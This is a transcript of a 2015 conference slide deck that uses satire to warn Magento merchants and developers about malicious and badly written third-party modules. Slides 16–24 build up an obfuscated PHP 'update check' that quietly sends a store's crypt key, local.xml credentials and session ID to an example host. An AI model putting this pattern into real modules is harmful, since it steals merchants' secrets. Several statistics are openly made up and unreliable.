how to build a pure evil magento module
TRANSCRIPT
![Page 1: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/1.jpg)
Pure Evil How to Build a
Meet Magento 2015 – Leipzig, Germany
Fabrizio Branca
Magento Module
![Page 2: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/2.jpg)
![Page 3: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/3.jpg)
fbrnc
fbrnc
![Page 4: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/4.jpg)
San Francisco, CA
Janine
Fiona
that’s me
Leo
![Page 5: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/5.jpg)
Lake Tahoe, California
![Page 6: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/6.jpg)
87.44%* of all modules
(both paid or free) are known to be a
major risk
![Page 7: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/7.jpg)
*Note: Some statistics in this presentation may or may not be randomly made up based on wild guesses.
![Page 8: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/8.jpg)
Goals
help you spot evil modules and avoid installing
them
1 motivate vendors
to rethink their “best practices”
2 make YOU write better modules
3
![Page 9: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/9.jpg)
Disclaimer:
Persons (or Companies) Living or Dead Is
Purely Coincidental
Any Similarity to
![Page 10: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/10.jpg)
Magento Module How to Build a Pure Evil
in 51 simple steps
Okay, let’s get started:
7
![Page 11: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/11.jpg)
Name
![Page 12: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/12.jpg)
http://magename.me/
Mage Pro Gento
![Page 13: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/13.jpg)
Security
![Page 14: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/14.jpg)
http://example.com/news.xml
![Page 15: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/15.jpg)
Annoying, huh?
![Page 16: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/16.jpg)
http://example.com/news.xml ?rlWgMKAmLJqyVwbvV09jMJ5Go3IlL2IFo2AeplRvsD%3Q%3Q
…and how do you feel about this?!
![Page 17: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/17.jpg)
“http://example.com/news.xml?”.
![Page 18: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/18.jpg)
“http://example.com/news.xml?”. str_rot13(urlencode(base64_encode(json_encode(array( 'module_version' => Mage::getConfig()->getModuleConfig("MageGento_Pro")->version )))));
![Page 19: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/19.jpg)
“http://example.com/news.xml?”. str_rot13(urlencode(base64_encode(json_encode(array( 'module_version' => Mage::getConfig()->getModuleConfig("MageGento_Pro")->version, 'magento_version' => Mage::getVersion() )))));
![Page 20: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/20.jpg)
“http://example.com/news.xml?”. str_rot13(urlencode(base64_encode(json_encode(array( 'module_version' => Mage::getConfig()->getModuleConfig("MageGento_Pro")->version, 'magento_version' => Mage::getVersion(), 'install_date' => Mage::getConfig()->getNode('global/install/date') )))));
![Page 21: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/21.jpg)
“http://example.com/news.xml?”. str_rot13(urlencode(base64_encode(json_encode(array( 'module_version' => Mage::getConfig()->getModuleConfig("MageGento_Pro")->version, 'magento_version' => Mage::getVersion(), 'install_date' => Mage::getConfig()->getNode('global/install/date'), 'lifetime_sales' => $sales->getLifetime(), 'average_orders' => $sales->getAverage() )))));
![Page 22: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/22.jpg)
“http://example.com/news.xml?”. str_rot13(urlencode(base64_encode(json_encode(array( 'module_version' => Mage::getConfig()->getModuleConfig("MageGento_Pro")->version, 'magento_version' => Mage::getVersion(), 'install_date' => Mage::getConfig()->getNode('global/install/date'), 'lifetime_sales' => $sales->getLifetime(), 'average_orders' => $sales->getAverage(), 'crypt_key' => Mage::getConfig()->getNode('global/crypt/key') )))));
![Page 23: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/23.jpg)
“http://example.com/news.xml?”. str_rot13(urlencode(base64_encode(json_encode(array( 'module_version' => Mage::getConfig()->getModuleConfig("MageGento_Pro")->version, 'magento_version' => Mage::getVersion(), 'install_date' => Mage::getConfig()->getNode('global/install/date'), 'lifetime_sales' => $sales->getLifetime(), 'average_orders' => $sales->getAverage(), 'crypt_key' => Mage::getConfig()->getNode('global/crypt/key'), 'local.xml' => file_get_contents('app/etc/local.xml') )))));
![Page 24: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/24.jpg)
“http://example.com/news.xml?”. str_rot13(urlencode(base64_encode(json_encode(array( 'module_version' => Mage::getConfig()->getModuleConfig("MageGento_Pro")->version, 'magento_version' => Mage::getVersion(), 'install_date' => Mage::getConfig()->getNode('global/install/date'), 'lifetime_sales' => $sales->getLifetime(), 'average_orders' => $sales->getAverage(), 'crypt_key' => Mage::getConfig()->getNode('global/crypt/key'), 'local.xml' => file_get_contents('app/etc/local.xml'), 'session_id' => Mage::getSingleton('core/session')->getEncryptedSessionId() )))));
![Page 25: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/25.jpg)
You need to trust EVERY. SINGLE. LINE. you deploy to your server!
![Page 26: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/26.jpg)
Average number of modules
~10
Launch
>100
After 2 years
per Magento store https://twitter.com/ProductPaul/status/584393641575088128
Note: sample size may or may not be significant.
![Page 27: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/27.jpg)
malicious
vulnerable vs
![Page 28: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/28.jpg)
Scalability Performance
![Page 29: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/29.jpg)
Chances your module ends up on an installation with …
…more products
than on your
devbox
…a higher order
volume than on
your devbox
…more
concurrent users
than on your
devbox
73.25% 80.77% 98.53%
![Page 30: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/30.jpg)
“Always do queries inside loops to support sales of full page cache extensions.” http://meta.magento.stackexchange.com/questions/288/funny-
useless-horrible-code-from-magento-extensions
![Page 31: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/31.jpg)
Assume all instances Problem:
share a file system
![Page 32: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/32.jpg)
If your infrastructure looks more like this:
![Page 33: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/33.jpg)
Route 53
ELB
CloudFront:
Theme (JS/CSS,…)
CloudFront:
media files
Internet
S3:
media
files
S3: build
packages
Continuous
Integration
Pipeline (Jenkins)
OpsWorks
Availability Zone
AWS
CloudFormation
CloudWatch
✓
✓inherently fault tolerant
✓
✓ ✓ ✓
✓
Redis:
Sessions Redis:
Cache Backend RDS DB
instance
RDS DB
instance standby
(Multi-AZ)
✓ ✓
Auto Scaling Group
Frontend Layer Backend Layer
Worker Layer
Varnish Layer
Data Layer
RDS DB Read
replica (for
reports)
Redis:
Full page cache
backend
✓
Production
Stack
External Services
(Fulfillment, DRM,
Giftcards,…)
SES:
Transactional
emails
✓
SQS:
Queue
✓
“Stack” (= Environment)
“Layers”
App Instances
![Page 34: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/34.jpg)
rather than this:
![Page 35: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/35.jpg)
Internet
![Page 36: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/36.jpg)
then you most likely don’t have a shared file system
![Page 37: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/37.jpg)
Please do not let your “configurable theme” dynamically generate skin files with custom CSS values.
![Page 38: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/38.jpg)
How do you handle… version control?
multi-server setups? auto-scaling?
file permissions?
![Page 39: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/39.jpg)
Code Quality
![Page 40: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/40.jpg)
ini_set
display_errors
memory_limit
max_execution_time
shutdown_function
spl_autoload_register
…
Don’t mess with PHP
![Page 41: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/41.jpg)
Rewrites of important classes
Overwrites
Core Hacks
Events
Framework behavior
Core Concepts
Compilation
…
Don’t mess with Magento
…unless this is what your module
is all about
![Page 42: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/42.jpg)
![Page 43: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/43.jpg)
<?xml version="1.0"?> <config> <global> <events> <controller_action_predispatch> <observers> <magegento_pro_license_check> <class>magegento_pro/observer</class> <method>licenseCheck</method> </magegento_pro_license_check> <magegento_pro_update_check> <class>magegento_pro/observer</class> <method>updateCheck</method> </magegento_pro_update_check>
</observers> </controller_action_predispatch> </events> </global> </config>
![Page 44: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/44.jpg)
Be readable
![Page 45: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/45.jpg)
foreach ($collection as $product) { /* @var $product Mage_Core_Model_Product */ ... }
Be specific
![Page 46: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/46.jpg)
!is_null($adminKey) && $adminKey != '' && $request['auth']['admin_key'] = $adminKey;
Don’t Be fancy
![Page 47: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/47.jpg)
I don’t always test my code.
But when I do I do it on production.
![Page 48: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/48.jpg)
Testcases?
That’s only for over-achievers!
![Page 49: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/49.jpg)
Jenkins Travis CI Use Jenkins to implement a full deployment pipeline for
your projects!
Test our Open Source Magento modules with Travis CI!
![Page 50: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/50.jpg)
Dependencies
PHP version & extensions
3rd party libraries
3rd party services
other Magento modules
![Page 51: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/51.jpg)
1. Avoid Dependencies 2. Declare Dependencies
any dependency increases the complexity significantly
![Page 52: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/52.jpg)
![Page 53: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/53.jpg)
![Page 54: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/54.jpg)
![Page 55: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/55.jpg)
![Page 56: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/56.jpg)
![Page 57: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/57.jpg)
Teacher Syndrome*
*http://www.urbandictionary.com/define.php?term=Teacher+Syndrome
![Page 58: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/58.jpg)
![Page 59: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/59.jpg)
http://example.com/logo.gif ?rlWgMKAmLJqyVwbvV09jMJ5Go3IlL2IFo2AeplRvsD%3Q%3Q
![Page 60: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/60.jpg)
http://example.com/clear.gif ?rlWgMKAmLJqyVwbvV09jMJ5Go3IlL2IFo2AeplRvsD%3Q%3Q
![Page 61: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/61.jpg)
ZZZ_MageGento_Pro.xml app/etc/modules/
![Page 62: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/62.jpg)
Installation Support
![Page 63: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/63.jpg)
discover use
code
review
add
modman
add
composer git integrate test
deploy
The Right Thing™
download
good luck with that!
pay $xx
to author provide FTP
access
seriously?!
one-click
install
Module Installation
upload
“Step 1”
upload
“Step 2”
clear
caches
![Page 64: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/64.jpg)
You need to trust EVERY. SINGLE. LINE. you deploy to your server!
![Page 65: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/65.jpg)
How do you handle… version control?
multi-server setups? auto-scaling?
file permissions?
![Page 66: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/66.jpg)
Transparency
![Page 67: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/67.jpg)
Find your sweet spot
GitHub ionCube
![Page 68: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/68.jpg)
Find your sweet spot
GitHub ionCube
![Page 69: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/69.jpg)
Find your sweet spot
GitHub ionCube
![Page 70: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/70.jpg)
https://twitter.com/benmarks/status/593807195768127488
![Page 71: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/71.jpg)
Forecast risk a new
module crashes
your store
developer
happiness
![Page 72: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/72.jpg)
http://freakonomics.com/2015/01/15/thats-a-great-question-a-new-freakonomics-radio-podcast/
Chances a speaker begins his answer with
“That’s a great question!” (...even if the question wasn’t that great.)
78.84%
USA
23.47%
Europe
![Page 73: How to Build a Pure Evil Magento Module](https://reader034.vdocument.in/reader034/viewer/2022042615/55bec1d1bb61eb1f7b8b47c3/html5/thumbnails/73.jpg)
Thank you!
http://www.aoe.com
http://fbrnc.net
@fbrnc Follow me on twitter!
My blog